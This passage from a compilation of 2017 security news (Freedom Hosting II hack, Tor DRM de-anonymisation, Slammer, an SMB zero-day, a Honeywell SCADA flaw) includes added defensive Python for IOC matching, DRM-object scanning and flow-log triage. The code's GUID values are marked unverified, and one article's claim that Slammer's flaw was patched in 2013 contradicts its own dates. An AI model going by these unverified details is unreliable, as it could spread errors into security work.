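        print(f"{ts} {client} -> {host}")
    print("clients to isolate:", affected_clients(SAMPLE_LOG, DEFANGED_IOCS))
```

The same refanged list can be fed to a DNS sinkhole or proxy deny list; the subdomain-aware match matters because delivery hosts are often moved to new labels under the same registered domain.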


Many Darknet Sites Defaced in "Freedom Hosting II" Hack

6.2.2017 securityweek Hacking

Thousands of Tor-based websites became inaccessible last week after hackers breached the systems of Freedom Hosting II, a service provider that is believed to host roughly 20 percent of the sites on the dark web.

While Freedom Hosting II has hosted nearly 11,000 websites, an analysis conducted by privacy and anonymity researcher Sarah Jamie Lewis has shown that only 1,500 - 2,500 of them had any content.

Hackers affiliated with the Anonymous hacktivist movement said more than half of the websites hosted by Freedom Hosting II contained child pornography, despite the provider’s claims that it does not tolerate this type of content.

As a result, the hackers defaced all the sites hosted by Freedom Hosting and leaked data taken from its systems. The hackers also provided information on how they managed to breach the organization’s systems.

Users who attempted to access the websites were shown a message that started with, “Hello Freedom Hosting II, you have been hacked.” The Verge reported that the hackers initially offered to sell the stolen data for 0.1 bitcoin (roughly $100), but later apparently decided to make it available for free. The address provided by the attackers has received a total of 0.12 bitcoins.

Sarah Jamie Lewis (@SarahJamieLewis) on Twitter, 6 Feb 2017:

“I've spent some time on the data now & I plan on writing much more about it in the future. But I'm gonna lay out my current thoughts.”

“First off, as I commented on Friday, this is a huge event. I think this will likely be seen as a milestone in the history of anonymity tech.” (2:53 AM)

“As an analogy: it's like someone taking down geocities in the late 90s... Sure there was lots of crap, but also lots of diverse content.”

“FHII made it easy for people to start playing with anonymous publishing - and in doing so created a huge vulnerability.” (3:03 AM)

Australian security expert Troy Hunt, the owner of the Have I Been Pwned breach notification service, analyzed the leaked data and discovered a 2.2 Gb database containing more than 380,000 user records, including email addresses, usernames and passwords.

Hunt believes law enforcement agencies will find the leaked data very useful, especially since it includes real email addresses. He also pointed out that many of the addresses are on .gov domains, but it’s unclear how many of them are real and what they have been used for.

The leaked data was also analyzed by Chris Monteiro, who confirmed that Freedom Hosting II hosted some large English and Russian-language forums related to child abuse. The researcher also identified fraud, account hacking, fetish and botnet websites.

The original Freedom Hosting was taken down by the FBI back in 2013. Before shutting it down, the agency exploited a vulnerability to identify darknet users.


ENISA Report Provides ICS-SCADA Protection Recommendations

6.2.2017 securityweek Safety
ENISA Publishes "Communication Network Dependencies for ICS-SCADA Systems" Report for Critical Infrastructure Protection

The clear emergence of cyber weapons used for political interference -- cyber espionage such as the OPM breach probably related to China; political manipulation such as the breach and leaks relating to the DNC by Russia; and physical damage such as the Ukraine power outages by Russia or its supporters -- has focused attention on the security of the critical national infrastructures. Much of that infrastructure is controlled and operated by ICS/SCADA systems.

The European Union Agency for Network and Information Security (ENISA) has published a new analysis and recommendations on 'Communication network dependencies for ICS/SCADA Systems' (PDF). The report concentrates on two of the primary causes of security concern: network segmentation and communication between the segments; and the wider issue of communications with the outside world that often uses the Internet.

The report was compiled from an analysis of stakeholder conversations with members of the ENISA ICS and SCADA groups together with data from official sources and other ICS/SCADA experts in the field. It highlights three primary causes for concern, and makes eight specific security recommendations for its target audience of asset owners and operators of electricity, oil, gas, transport, health, water supply, and the manufacturing industry.

The three worrying attack scenarios are remote compromise allowing an attacker to take control of one or multiple assets within the network; the insider threat from a disgruntled employee, contractor or third-party staff with in-depth knowledge of the infrastructure; and the risk of infection during the maintenance or upgrade process. Associated with the third concern is the website where the update files and firmware are located.


The report examines ICS/SCADA communication networks and their interdependencies, and examines the threats, vulnerabilities, incidents and attacks affecting those networks while focusing on those that might result in cascading effects. It also presents a gap analysis to highlight areas that require further work.

A section on security good practices outlines the necessary steps in first understanding and then protecting the network. This includes a list of technology and processes that can "greatly increase the protection of the availability, integrity, confidentiality and non-repudiation" of the network and its communications.

Finally, it presents a list of eight "high-level recommendations for manufacturers, operators and security experts that will help them to improve the security level and resilience of the ICS/SCADA systems and communication network functions." These are:

1. Include security as a main consideration during the design phase of ICS SCADA systems.

2. Identify and establish roles of people operating in ICS/SCADA systems.

3. Define network communication technologies and architecture with interoperability in mind.

4. Establish brainstorming and communication channels for the different participants on the lifecycle of the devices to exchange needs and solutions.

5. Include the periodic ICS/SCADA device update process as part of the main operations of the systems.

6. Establish periodic ICS/SCADA security training and awareness campaign within the organization.

7. Promote increased collaboration amongst policy decision makers, manufacturers and operators at EU Level.

8. Define guidelines for the establishment of reliable and appropriate cybersecurity insurance requirements.

These recommendations, modified where necessary, would form part of good practice for any industry. The ENISA report goes further, focusing on their particular relevance to operational technology. For example, for the first 'security by design' recommendation, it explains that, "Traditionally, only safety is included as one of the main considerations during the design of an ICS/SCADA system or infrastructure (alongside efficiency, real-time constraints, etc.). However, the concept of security is not, although it is now one of the main risk sources that should be covered to prevent future attacks and incidents."

While users have little control over ICS/SCADA development and manufacturing processes, ENISA recommends that "during the design phase, the security of the devices, and the communications between them, has to be one of the main concepts that will impact on the choice of devices, measures to implement, and overall design of the architecture."

As a result of this process, writes ENISA, "the systems' security is increased as many threats have been mitigated. This can be measured via risk assessment, vulnerability assessment or penetration test."

This basic structure is repeated for each of the recommendations: a description of the issue, action required, and effect of implementation. The result is a thorough examination of the ICS/SCADA security landscape together with practical steps to improve the security posture of the critical national infrastructure.


Microsoft Windows DRM issue could be exploited to uncloak Tor Browser users
6.2.2017 securityaffairs Exploit

HackerHouse researchers have discovered that media content protected by Digital Rights Management (DRM) can be used to uncloak Windows Tor Browser users.
The anonymity of Tor users is threatened by a new issue related to Microsoft’s DRM. Windows users running the Tor Browser can be de-anonymized with a trick based on the Microsoft DRM (Digital Rights Management) mechanism.

The discovery was made by researchers at Hacker House while they were conducting a study on social engineering attacks made by using a content protected with DRM.

Tor users can be unmasked simply by opening a media file, which reveals the user’s real IP address.

“DRM is a licensing technology that attempts to prevent unauthorised distribution and restrictive use of a media file. It works by encrypting the video and audio streams with an encryption key and requesting a license (decryption key) from a network server when the file is accessed. As it requires network connectivity it can cause users to make network requests without consent when opening a media file such as a video file or audio file. WMV is using Microsoft Advanced Systems Format (ASF) to store audio and video as objects. This file format consists of objects that are labelled by GUID and packed together to make a media package.” reads the analysis published on myhackerhouse.com.

Simplifying the problem, DRM-protected content has to fetch a license key from a server in order to be played. Windows shows a warning dialog to the user if the content isn’t signed properly.

“However, this warning DOES NOT appear if the DRM license has been signed correctly and the Digital Signature Object, Content Encryption Object and Extended Content Encryption Object contain the appropriate cryptographic signing performed by an authorised Microsoft License Server profile”


Researchers at Hacker House highlighted that Microsoft charges an expensive fee to anyone who wants to sign media.

“DRM is expensive business and unless you use the SDK to develop your own application you will likely need to make use of a license provider to encrypt your WMV files using these tools and also for signing purposes. If you want to build your own Microsoft DRM signing solution the price-tag is around $10,000.” states Hacker House.

The experts also found online services that manage to generate signed content without such an expensive payment. Windows DRM providers that can sign user-supplied media could therefore be used to decloak Tor users.

“There are several free DRM providers who could sign your media for you however as the barrier to entry to the DRM market is the aforementioned price tag, it makes you wonder how these files are being signed in the wild!” continues the analysis.

“As these “signed WMV” files do not present any alert to a user before opening them they can be used quite effectively to decloak users of the popular privacy tool TorBrowser with very little warning”, they write.

Experts at the Tor Project are aware of the possibility that attackers track Windows Tor users by leveraging the Windows DRM issue. They advise users to run Tails if they need to open media files.
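The quoted analysis describes WMV as an ASF container made of GUID-labelled objects, and the signing objects (Content Encryption, Extended Content Encryption, Digital Signature) are what distinguish a file that will silently contact a license server from plain media. A defender can therefore inspect a file for those objects before any player opens it. The scanner below is an added example, not Hacker House's code: it walks the ASF Header Object and reports which DRM-related sub-objects are present. The GUID constants are the values from Microsoft's ASF specification as I recall them (an assumption to verify against the spec), and both sample "files" are constructed byte strings rather than real media.

```python
"""Pre-open check for Windows Media DRM objects in an ASF/WMV file.

Added example, not Hacker House's code. It walks the ASF Header Object and
reports which DRM-related sub-objects (Content Encryption, Extended Content
Encryption, Digital Signature) are present, so a file can be inspected before
a media player opens it and makes the license request described above.
Assumptions: the GUID constants are the values from Microsoft's ASF
specification as I recall them (verify against the spec), and the two sample
files are constructed byte strings, not real media.
"""
import struct
import uuid
from typing import Dict, List

# ASF object identifiers (assumption: taken from the ASF specification, verify).
HEADER_OBJECT = uuid.UUID("75B22630-668E-11CF-A6D9-00AA0062CE6C")
FILE_PROPERTIES_OBJECT = uuid.UUID("8CABDCA1-A947-11CF-8EE4-00C00C205365")
CONTENT_ENCRYPTION_OBJECT = uuid.UUID("2211B3FB-BD23-11D2-B4B7-00A0C955FC6E")
EXT_CONTENT_ENCRYPTION_OBJECT = uuid.UUID("298AE614-2622-4C17-B935-DAE07EE9289C")
DIGITAL_SIGNATURE_OBJECT = uuid.UUID("2211B3FC-BD23-11D2-B4B7-00A0C955FC6E")

DRM_OBJECTS: Dict[uuid.UUID, str] = {
    CONTENT_ENCRYPTION_OBJECT: "Content Encryption Object",
    EXT_CONTENT_ENCRYPTION_OBJECT: "Extended Content Encryption Object",
    DIGITAL_SIGNATURE_OBJECT: "Digital Signature Object",
}


def list_header_objects(data: bytes) -> List[uuid.UUID]:
    """Return the GUIDs of the sub-objects inside the top-level Header Object.

    Layout: GUID (16 bytes, little-endian fields), object size (uint64 LE),
    sub-object count (uint32 LE), two reserved bytes; then each sub-object is
    GUID (16) + size (uint64 LE, includes its own 24-byte header) + payload.
    """
    if len(data) < 30 or uuid.UUID(bytes_le=data[:16]) != HEADER_OBJECT:
        raise ValueError("not an ASF file (missing Header Object)")
    header_size, count = struct.unpack_from("<QI", data, 16)
    end = min(header_size, len(data))  # never trust the declared size past the buffer
    found: List[uuid.UUID] = []
    pos = 30
    while pos + 24 <= end and len(found) < count:
        sub_guid = uuid.UUID(bytes_le=data[pos:pos + 16])
        (sub_size,) = struct.unpack_from("<Q", data, pos + 16)
        if sub_size < 24:  # a smaller size would make the walk loop forever
            raise ValueError("malformed sub-object size")
        found.append(sub_guid)
        pos += sub_size
    return found


def drm_objects_present(data: bytes) -> List[str]:
    """Names of the DRM-related objects found, in file order ([] for plain media)."""
    return [DRM_OBJECTS[g] for g in list_header_objects(data) if g in DRM_OBJECTS]


# --- constructed sample files (fixtures, not real WMV content) ---------------

def _asf_object(guid: uuid.UUID, payload: bytes) -> bytes:
    return guid.bytes_le + struct.pack("<Q", 24 + len(payload)) + payload


def build_sample(sub_objects: List[bytes]) -> bytes:
    """Minimal ASF Header Object wrapping the given sub-objects (reserved bytes 0x01, 0x02)."""
    body = b"".join(sub_objects)
    return HEADER_OBJECT.bytes_le + struct.pack("<QIBB", 30 + len(body), len(sub_objects), 1, 2) + body


PLAIN_WMV = build_sample([_asf_object(FILE_PROPERTIES_OBJECT, b"\x00" * 80)])
DRM_WMV = build_sample([
    _asf_object(FILE_PROPERTIES_OBJECT, b"\x00" * 80),
    _asf_object(CONTENT_ENCRYPTION_OBJECT, b"\x00" * 16),
    _asf_object(EXT_CONTENT_ENCRYPTION_OBJECT, b"\x00" * 32),
    _asf_object(DIGITAL_SIGNATURE_OBJECT, b"\x00" * 8),
])

if __name__ == "__main__":
    for name, blob in (("plain", PLAIN_WMV), ("drm", DRM_WMV)):
        print(name, drm_objects_present(blob) or "no DRM objects")
```

The walk is bounded by both the declared header size and the actual buffer length, and a sub-object size below its own 24-byte header is rejected, so a truncated or deliberately malformed file cannot make the check loop or read past the end. A non-empty result is the signal to open the file only in an environment such as Tails, as the Tor Project suggests.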


A fifth of companies worldwide were targeted by cyberattacks last year

6.2.2017 Novinky/Bezpečnost Kyber
The share of companies worldwide that were targeted by a cyberattack rose last year by six percentage points to 21 percent. The total estimated damage for 2016 is 279 billion US dollars (almost seven trillion crowns). Extortion saw the biggest increase. This follows from a Grant Thornton study covering information from 10,000 companies in 37 countries.
In North America 24 percent of companies admitted attacks, in the EU as many as 32 percent. The average is pulled down by the Asia-Pacific region with 13 percent of companies attacked. However, the marked increase in cybercrime affects all regions.

The most common primary consequence of cyberattacks is damaged reputation, cited by 29 percent of companies, followed by the loss of time and energy that must be spent remedying the resulting damage. Loss of customers was named as the primary damage by 16 percent of companies, and seven percent of companies felt a direct drop in turnover.

Extortion is in fashion
The most frequently occurring form of cyberattack is damage to business infrastructure. This variant was admitted by 22 percent of the attacked companies. Experience with extortion under threat of publishing information, violence or damage to company assets was admitted by 17 percent of companies.

"Extortion has traditionally been seen as a particularly foul practice within the palette of financial crimes. In the online world, moreover, extortion is very well organized. But it does not end with the attack itself. Following such an attack, the organization incurs further financial losses due to damaged reputation, theft of information and intellectual property, and possibly physical damage to infrastructure," said Grant Thornton partner David Pirner.

According to Grant Thornton experts, companies react to cyberattacks too late. A total of 13 percent of companies found out that they had become victims of a cyberattack only after more than a week. Four companies in a hundred even after more than a month.


Did the hack of the Ministry of Foreign Affairs come at just the right moment?
6.2.2017 Novinky/Bezpečnost BigBrother
The sponsors of the Military Intelligence bill are "riding high". It is now surely evident that the Czech Republic needs cyber defence and that the state will take care of it best.
As you surely know, an amendment to the Military Intelligence Act is currently before the Chamber of Deputies; it is to entrust the defence (yes, that is definitely something other than protection) of Czech cyberspace to Military Intelligence (VOZ). If you will allow me a great simplification, the bill essentially says that VOZ will install cyber defence tools into operators' networks, these being technical means serving to prevent, halt or repel a cyberattack that threatens the provision of the defence of the Czech Republic. Operators are obliged to keep quiet about the connection of cyber defence tools.

No wonder that such a vaguely worded bill provoked a wave of resentment. Probably the most visible protest is the statement of three major associations – CZ.NIC, ICT Unie and NIX.CZ. Of course, many more arguments against this amendment can be found. Then came a bombshell: someone hacked the mail server of the Ministry of Foreign Affairs of the Czech Republic, and suddenly the bill's sponsors are "riding high". It is now surely evident that the Czech Republic needs cyber defence and that the state will take care of it best. I also read an interesting interview on this topic on Aktualne.cz. But is this security incident really an argument for adopting this amendment? I think it is exactly the opposite!


In the interview mentioned, the Minister of (general) Defence states that if the bill were passed, military intelligence officers would intervene. It sounds like a clear argument for the rapid adoption of the bill. But I keep asking myself: "Who prevented them?" And now please forgive me for treating the state administration as a single whole in the following lines. Nevertheless, the state was in no way forbidden from taking care of its own cyber security (or defence, if you will). If the state wants to put cyber defence devices into the networks of private operators, why has it not already installed them into its own state networks, to show how beneficial these devices are? Why does the state, or specifically VOZ, not boast of the number of attacks repelled in the networks of state authorities, to show that this will clearly benefit the private sector as well? Isn't it rather the opposite? No major private e-mail provider has had such a serious incident recently. So why does someone think the state will protect us and that it should install cyber defence tools in the networks of private operators? Why doesn't it start with itself? It could start, for example, at the Ministry of Foreign Affairs and other ministries.


Incidentally, it is very interesting to watch how the sponsors' arguments for the bill change in reaction to that statement by the associations. For example, even in the interview mentioned it is said that the cyber defence devices in question will be passive only, and so taking them out of operation cannot cause any serious operational problems. But that is in direct contrast to the definition contained in the proposed amendment. That definition speaks clearly of technical means serving to prevent, halt or repel a cyberattack. If the devices are to be for interception only, why does the bill speak of halting and repelling?

I definitely support the state's effort to increase the cyber security of its systems. But I do not think that the right means is the interception of all networks, including those unrelated to state systems. I firmly believe that every cloud has a silver lining. I hope this strange bill will kick-start a serious debate on how to increase the country's cyber security, and that the state will abandon its strange Orwellian ideas and start seriously addressing how to improve the security of its IT systems.


Darknet Marketplace Hansa Launches Bug Bounty Program

6.2.2017 securityweek Security
The darknet marketplace Hansa announced last week the launch of a bug bounty program with rewards of up to 10 bitcoins, currently worth more than $10,000.

Hansa allows users to buy and sell various types of items, including drugs, fraud-related services, jewelry, counterfeit products, electronics, and IT services. The marketplace is designed to minimize the risk of scams operated by vendors and Hansa administrators, and claims to guarantee that users will not lose their funds in case of a hack or law enforcement operation.

In an effort to minimize the chances of the website getting hacked, Hansa’s owners have decided to launch a bug bounty program. The highest rewards, up to 10 bitcoins, will be paid out for vulnerabilities that could “severely disrupt Hansa’s integrity,” such as flaws that expose IP addresses or user information.

Hansa has promised 1 bitcoin, worth roughly $1,000, for bugs and vulnerabilities that are not critical. Users can also earn 0.05 bitcoins ($50) for reporting simple display bugs or unintended behavior.

“To be eligible, you must demonstrate a security compromise on our market using a reproducible exploit. Should you encounter a bug please open a ticket and inform us about your findings,” Hansa administrators wrote in a Reddit post announcing the bug bounty program.

Users who submit vulnerability or bug reports must not make their findings public before the issue has been fixed, and they must refrain from conducting any tests that could have a negative impact on the website or its users. Hansa has advised users to provide detailed proof-of-concepts (PoCs) to increase their chances of receiving a reward.

Hansa has promised to respond to vulnerability and bug reports as quickly as it can, and provide updates while it works to address the problem.

In the Reddit post announcing the launch of the bug bounty program, two users said they had already submitted reports describing vulnerabilities that could have serious consequences if exploited.

Last month, someone reported finding a vulnerability that exposed the private messages exchanged by users of the popular darknet marketplace AlphaBay. The individual who discovered the security hole claimed to have created a bot that collected more than 200,000 private messages.

The same individual also said he had identified a flaw in the Hansa marketplace, which allegedly allowed him to obtain 240,000 Hansa usernames.


The Slammer worm is back after 13 years to target ancient SQL servers
6.2.2017 securityaffairs Virus
The SQL Slammer worm, one of the longest-lived pieces of malware, now seems to be back online to compromise ancient SQL servers worldwide.
SQL Slammer is probably one of the longest-lived threats: it first appeared 14 years ago and is now back to compromise ancient SQL servers.

SQL Slammer exploits an ancient flaw in Microsoft SQL Server and Desktop Engine, causing a denial of service. It was in 2003 that the security researcher Michael Bacarella raised the alarm about Slammer, and the worm caused a denial of service condition on tens of thousands of systems around the world.

The researcher noticed a “massive packet loss to various points on the globe” caused by a worm affecting MS SQL Server which was pingflooding addresses at some random sequence.

The worm exploits a buffer overflow vulnerability in Microsoft SQL Server 2000 or MSDE 2000 by sending a specially formatted request to UDP port 1434.

After the worm infects a server, it attempts to spread rapidly by sending the same payload to random IP addresses, causing a denial of service condition on the victim’s machine.

SQL Slammer was built from proof-of-concept exploit code published at Black Hat by David Litchfield, now a Google security researcher.

The Slammer Worm was using a SQL Server Resolution service buffer overflow flaw, discovered by NGSSoftware, and patched by MS in July 2013.

Now researchers at Check Point have confirmed that the threat rose again in early December (between November 28 and December 4, 2016), mostly targeting machines in the US.

“During a routine analysis of global data collected by Check Point ThreatCloud, we detected a massive increase in the number of attack attempts between November 28 and December 4, 2016, making the SQL Slammer worm one of the top malware detected in this timeframe:” reads the analysis published by Check Point.

“The attack attempts detected by Check Point were directed to a large variety of destination countries (172 countries in total), with 26% of the attacks being towards networks in the United States. This indicates a wide wave of attacks rather than a targeted one.”

The researchers noticed that the largest volume of traffic associated with the Slammer worm originated from IP addresses in China, Vietnam, and Mexico.

This is absurd: the worm appears to target a now-ancient SQL Server 2000 buffer overflow vulnerability that DB administrators still haven’t patched after more than 13 years.

“To summarize, although the Slammer worm was primarily spread during 2003, and has barely been observed in the wild over the last decade, the massive spike in propagation attempts that was observed in our data leads us to wonder – is the worm trying to make a comeback?” states the report.


Windows SMB Zero-Day Exploit Released in the Wild after Microsoft delayed the Patch
6.2.2017 thehackernews Vulnerability
Last weekend a security researcher publicly disclosed a zero-day vulnerability in Windows 10, Windows 8.1 and Server editions after Microsoft failed to patch it in the past three months.
The zero-day memory corruption flaw resides in the implementation of the SMB (Server Message Block) network file sharing protocol and could allow a remote, unauthenticated attacker to crash systems with a denial of service attack, which would then open them to further attacks.
According to US-CERT, the vulnerability could also be exploited to execute arbitrary code with Windows kernel privileges on vulnerable systems, but this has not been confirmed by Microsoft at this time.
Without revealing the actual scope of the vulnerability and the kind of threat the exploit poses, Microsoft has just downplayed the severity of the issue, saying:
"Windows is the only platform with a customer commitment to investigate reported security issues, and proactively update impacted devices as soon as possible. We recommend customers use Windows 10 and the Microsoft Edge browser for the best protection."
However, the proof-of-concept exploit code, Win10.py, has already been released publicly for Windows 10 by security researcher Laurent Gaffie and does not require targets to use a browser.
The memory corruption flaw resides in the manner in which Windows handles SMB traffic; to exploit it, attackers only need to trick victims into connecting to a malicious SMB server, which could be done with simple social engineering.
"In particular, Windows fails to properly handle a server response that contains too many bytes following the structure defined in the SMB2 TREE_CONNECT Response structure," CERT said in the advisory.
"By connecting to a malicious SMB server, a vulnerable Windows client system may crash (BSOD) in mrxsmb20.sys."
Since the exploit code is now publicly available to everyone and there is no official patch from Microsoft, all Windows users are left open to potential attacks at this time.
Until Microsoft patches the memory corruption flaw (most probably in the upcoming Windows update or out-of-band patch), Windows users can temporarily fix the issue by blocking outbound SMB connections (TCP ports 139 and 445 and UDP ports 137 and 138) from the local network to the WAN.
The vulnerability has been given Common Vulnerability Scoring System (CVSS) score of 7.8. Proof-of-concept code has been published on GitHub.
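Both of the preceding articles describe behaviour that shows up plainly in network flow records: Slammer propagates by spraying UDP/1434 datagrams at random addresses, so an infected host fans out to many distinct destinations in seconds, and the interim mitigation for the SMB client flaw is to stop TCP 139/445 and UDP 137/138 from leaving the local network. The triage script below is an added example, not Check Point's, CERT's or anyone else's code, that serves both passages: it parses a flow log, flags sources with UDP/1434 fan-out, and lists SMB flows from local to non-local addresses (which is what the egress block should make impossible). The record layout, the sample records, the fan-out threshold and the LOCAL_NETS prefixes are all assumptions of the example.

```python
"""Flow-log triage for the two articles above: SQL Slammer propagation
(UDP/1434 fan-out from one source) and SMB traffic leaving the local network
(what the interim egress block for the unpatched SMB client flaw should stop).

Added example, not Check Point's, CERT's or anyone else's code. The flow record
layout "<ts> <proto> <src_ip> <src_port> <dst_ip> <dst_port> <bytes>", the
sample records, the fan-out threshold and the LOCAL_NETS prefixes are all
assumptions of this example; adjust the prefixes to the site's own ranges.
"""
import ipaddress
from collections import defaultdict
from typing import Dict, List, NamedTuple


class Flow(NamedTuple):
    ts: str
    proto: str
    src: str
    sport: int
    dst: str
    dport: int
    nbytes: int


# Assumed address ranges that count as "local"; everything else is WAN.
LOCAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
SLAMMER_PORT = 1434          # SQL Server Resolution Service, UDP
SMB_TCP_PORTS = {139, 445}
SMB_UDP_PORTS = {137, 138}

# Constructed sample records (destination addresses from the TEST-NET ranges).
SAMPLE_FLOWS = """\
# ts proto src sport dst dport bytes
2016-12-01T10:00:01Z udp 10.1.2.3 40001 192.0.2.10 1434 404
2016-12-01T10:00:01Z udp 10.1.2.3 40002 192.0.2.11 1434 404
2016-12-01T10:00:01Z udp 10.1.2.3 40003 198.51.100.7 1434 404
2016-12-01T10:00:01Z udp 10.1.2.3 40004 203.0.113.5 1434 404
2016-12-01T10:00:02Z udp 10.1.2.3 40005 203.0.113.6 1434 404
2016-12-01T10:00:02Z udp 10.1.2.3 40006 10.1.9.9 1434 404
2016-12-01T10:00:05Z udp 10.1.2.9 50123 10.1.2.40 1434 60
2016-12-01T10:01:00Z tcp 10.1.2.3 49200 203.0.113.7 445 1200
2016-12-01T10:01:05Z tcp 10.1.2.5 49201 10.1.2.10 445 5000
2016-12-01T10:01:09Z udp 10.1.2.5 137 198.51.100.4 137 78
2016-12-01T10:01:12Z tcp 10.1.2.5 49202 198.51.100.4 80 900
"""


def parse_flows(text: str) -> List[Flow]:
    """Parse the assumed whitespace-separated layout, skipping comments and short lines."""
    flows: List[Flow] = []
    for line in text.splitlines():
        if line.startswith("#"):
            continue
        f = line.split()
        if len(f) != 7:
            continue
        flows.append(Flow(f[0], f[1].lower(), f[2], int(f[3]), f[4], int(f[5]), int(f[6])))
    return flows


def is_local(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in LOCAL_NETS)


def slammer_fanout(flows: List[Flow], min_targets: int = 5) -> Dict[str, int]:
    """Sources that sent UDP/1434 to at least min_targets distinct hosts.

    Slammer sprays one datagram per random target, so the number of distinct
    destinations is the tell; a legitimate client resolving one SQL instance
    (10.1.2.9 in the sample) stays below the threshold.
    """
    targets: Dict[str, set] = defaultdict(set)
    for f in flows:
        if f.proto == "udp" and f.dport == SLAMMER_PORT:
            targets[f.src].add(f.dst)
    return {src: len(t) for src, t in targets.items() if len(t) >= min_targets}


def smb_to_wan(flows: List[Flow]) -> List[Flow]:
    """SMB flows from a local source to a non-local destination.

    These are exactly the connections the interim mitigation in the article
    (block TCP 139/445 and UDP 137/138 from LAN to WAN) is meant to stop; any
    hit means the egress filter is missing or a client already reached out.
    """
    hits = []
    for f in flows:
        smb = (f.proto == "tcp" and f.dport in SMB_TCP_PORTS) or \
              (f.proto == "udp" and f.dport in SMB_UDP_PORTS)
        if smb and is_local(f.src) and not is_local(f.dst):
            hits.append(f)
    return hits


def triage(text: str) -> Dict[str, object]:
    flows = parse_flows(text)
    return {"slammer_sources": slammer_fanout(flows), "smb_egress": smb_to_wan(flows)}


if __name__ == "__main__":
    report = triage(SAMPLE_FLOWS)
    print("UDP/1434 fan-out:", report["slammer_sources"])
    for f in report["smb_egress"]:
        print(f"SMB egress {f.src} -> {f.dst}:{f.dport}/{f.proto} at {f.ts}")
```

Fan-out is counted per distinct destination rather than per packet or byte volume, because a single legitimate SQL Browser query looks identical to one Slammer datagram in isolation; only the spread across many targets separates the two. The SMB check deliberately uses an explicit list of local prefixes instead of a generic "private address" test, since an egress rule is always written against the site's own ranges.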


New York Man Admits to Role in Cybercrime Operation

6.2.2017 securityweek Cyber

Vyacheslav Khaimov, a 55-year-old man from Brooklyn, New York, has admitted taking part in an international cybercrime scheme and pleaded guilty to operating an unlicensed money transmitting business.

Khaimov was initially charged with conspiracy to commit wire and bank fraud, wire fraud, bank fraud, money laundering conspiracy, and money laundering.

According to authorities, cybercriminals used “sophisticated malware” to gain access to bank accounts, mostly belonging to people in the United States. The funds stolen from these accounts were wired to money mules in the U.S., who sent them to other intermediaries in the country, including Khaimov, or directly overseas.

The FBI determined that Khaimov, who had been using the alias “Samuel Gold,” received tens of thousands of dollars on numerous occasions from other mules, and forwarded the money to overseas co-conspirators, including to accounts in Thailand and various companies operated by these co-conspirators.

Investigators said Khaimov and a company he owned received more than $230,000 taken from the accounts of at least eight victims. Authorities believe the man was involved in fraudulent wire transfers pertaining to at least 20 victims.

The FBI has identified more than 20 money mules and over 30 victims. The cybercrime operation caused over $1.2 million in losses, but the fraudsters attempted to steal more than $6 million.

The FBI’s investigation into this scheme is ongoing and the agency says it’s determined to bring all co-conspirators to justice – court documents show there are at least four.


SCADA Honeywell XL Web II Controller exposed password in clear text
6.2.2017 securityaffairs Incident

The web-based SCADA system Honeywell XL Web II Controller is affected by multiple flaws that can be remotely exploited to expose passwords in clear text.
A popular web-based SCADA system designed by Honeywell is affected by multiple vulnerabilities that can be remotely exploited to expose passwords in clear text.

In order to access the password in clear text, the attacker just has to access a particular URL to trigger one of the flaws.

The vulnerabilities affect some versions of Honeywell XL Web II controllers, a system that is widely adopted in critical infrastructure across various industries, including energy, wastewater, and manufacturing.

According to the ICS-CERT security advisory, the majority of the affected products are located in Europe and the Middle East.

The Department of Homeland Security’s Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) issued a security advisory to warn of the flaws.

“Independent researcher Maxim Rupp has identified vulnerabilities in Honeywell’s XL Web II controller application.” reads the security advisory. “An attacker may use these vulnerabilities to expose a password by accessing a specific URL. The XL Web II controller application effectively becomes an entry point into the network where it is located.”

ICS-CERT (@ICSCERT) on Twitter, 2 Feb 2017: “ICS-CERT issued advisory ICSA-17-033-01 Honeywell XL Web II Controller Vulnerabilities to ICS-CERT web site http://go.usa.gov/x9Hqg”

Maxim Rupp (@mmrupp) on Twitter, 6 Jan 2017: “#Honeywell XL1000C500 XLWebExe-2-01-00 and prior + XLWeb 500 XLWebExe-1-02-08 and prior. Coming soon. #ICS #Advisory”
The affected products are the Honeywell XL1000C500 XLWebExe-2-01-00 and prior, and XLWeb 500 XLWebExe-1-02-08 and prior.

Honeywell has released a new version (3.04.05.05) to address the vulnerabilities; to receive the security updates, customers have to contact their local Honeywell Building Solutions branch.

Other flaws in the Honeywell XL Web II controllers can be exploited as well: an attacker can carry out a path traversal attack by accessing a specific URL, open and change some parameters by accessing a particular URL, or establish a new user session.

Maxim Rupp, the researcher who discovered the flaws, has detailed them in a recently published blog post.


Anonymous Hacker took down over 10,000 Dark Web Sites; Leaked User Database
5.2.2017 thehackernews Hacking

Dark Web is right now going through a very rough time.
Just two days ago, a hacker group affiliated with Anonymous broke into the servers of Freedom Hosting II and took down more than 10,000 Tor-based .onion dark websites with an alarming announcement to its visitors, which said:
"Hello, Freedom Hosting II, you have been hacked."
Freedom Hosting II is the single largest host of underground websites accessible only through the Tor anonymising browser; it hosts somewhere between 15 and 20 percent of all sites on the Dark Web, anonymity and privacy researcher Sarah Jamie Lewis estimated.
Besides defacing all Dark Web sites hosted on Freedom Hosting II with the same message and stealing its database, the hackers also demanded a ransom for 0.1 Bitcoin (just over $100) to return the compromised data to the hosting service.
Now, it has been reported that the stolen database from Freedom Hosting II has publicly been released online to a site hosted on the Tor network, which includes the email details of nearly 381,000 users, 'Have I Been Pwned' tweeted.

According to the Anonymous hackers, more than 50 percent of all files hosted on Freedom Hosting II servers were related to child pornography.
Those illegal websites were using gigabytes of data when Freedom Hosting II officially allows no more than 256MB per site, the Anonymous hacker claimed.
In addition to the users' details, the data dump also contains backups of website databases, most of them from popular free, open-source content management systems and forums such as WordPress and phpBB.
In an interview with Motherboard, an Anonymous hacker who claimed responsibility for the hack said this was his first hack ever, and he never intended to take down the hosting provider.
But when he allegedly discovered several large child pornography websites using more than Freedom Hosting II's stated allowance, he decided to take down the service. The hacker claimed to have downloaded 74GB of files and a users database dump of 2.3GB.
Lewis has been analyzing the leaked data and reported that the database contains Dark Web users' numerous plain text emails, usernames, and hashed passwords from forum websites hosted by Freedom Hosting II.
While it's bad news for users who joined one of those forums providing their genuine personal details, law enforcement would be happy, as in a separate case, the FBI used location-tracking malware to infiltrate Dark Web porn sites and track individual users.


Anonymous hacked Freedom Hosting II, a fifth of the Dark Web is down
5.2.2017 securityaffairs Hacking

The hacktivist collective Anonymous has hacked Freedom Hosting II, a popular Dark Web hosting provider; a fifth of all .onion websites are down.
The collective Anonymous is back: this time the group breached Freedom Hosting II, a popular Dark Web hosting provider.

